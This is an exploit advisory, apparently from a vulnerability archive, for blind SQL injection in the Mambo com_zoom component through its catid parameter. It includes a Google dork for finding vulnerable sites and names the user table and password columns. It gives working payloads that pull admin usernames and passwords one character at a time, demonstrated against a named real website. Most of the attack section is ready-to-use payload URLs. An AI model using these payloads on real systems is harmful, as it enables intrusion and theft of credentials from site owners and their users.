The Mambo Zoom component remote blind SQL injection vulnerability

2009.09.11
Credit: boom3rang
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

Mambo component com_zoom (catid) Blind SQL injection [_][-][X] _ ___ _ ___ ___ ___ _____ __ ___ __ __ ___ | |/ / || |/ __|___ / __| _ \ __\ \ / / |_ ) \ / \/ _ \ | ' <| __ | (_ |___| (__| / _| \ \/\/ / / / () | () \_, / |_|\_\_||_|\___| \___|_|_\___| \_/\_/ /___\__/ \__/ /_/ Red n'black i dress eagle on my chest. It's good to be an ALBANIAN Keep my head up high for that flag i die. Im proud to be an ALBANIAN ################################################################### Author : boom3rang Contact : boom3rang[at]live.com Greetz : H!tm@N - KHG - cHs R.I.P redc00de ------------------------------------------------------------------- Affected software description <name>zoom</name> <creationDate>20/01/2004</creationDate> <author>Mike de Boer</author> <authorEmail>mailme@mikedeboer.nl</authorEmail> <authorUrl>www.mikedeboer.nl</authorUrl> <version>2.0</version> ------------------------------------------------------------------- [~] SQLi : http://www.TARGET.com/index.php?option=com_zoom&Itemid=0&catid=[SQLi] [~]Google Dork : inurl:com_zoom inurl:"imgid" ------------------------------------------------------------------- [~] Table_NAME = mos_users [~] Column_NAME = username - password ------------------------------------------------------------------- [~] Admin Path : http://www.TARGET.com/administrator =================================================================== = POC = =================================================================== [~] Live Demo: ttp://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=1/* --> True ttp://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=2/* --> False ------------------------------------------------------------------- [~] ASCII index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>96 ------------------------------------------------------------------- [~] Live Demo ASCII True http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>96 False http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>97 Like we see, the first charter of username is 'a' char(97)=a Now you can change the second limit to find other charters, Good Luck... note: <name>zoom</name> <creationDate>20/01/2004</creationDate> <author>Mike de Boer</author> <authorEmail>mailme@mikedeboer.nl</authorEmail> <authorUrl>www.mikedeboer.nl</authorUrl> <version>2.0</version>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top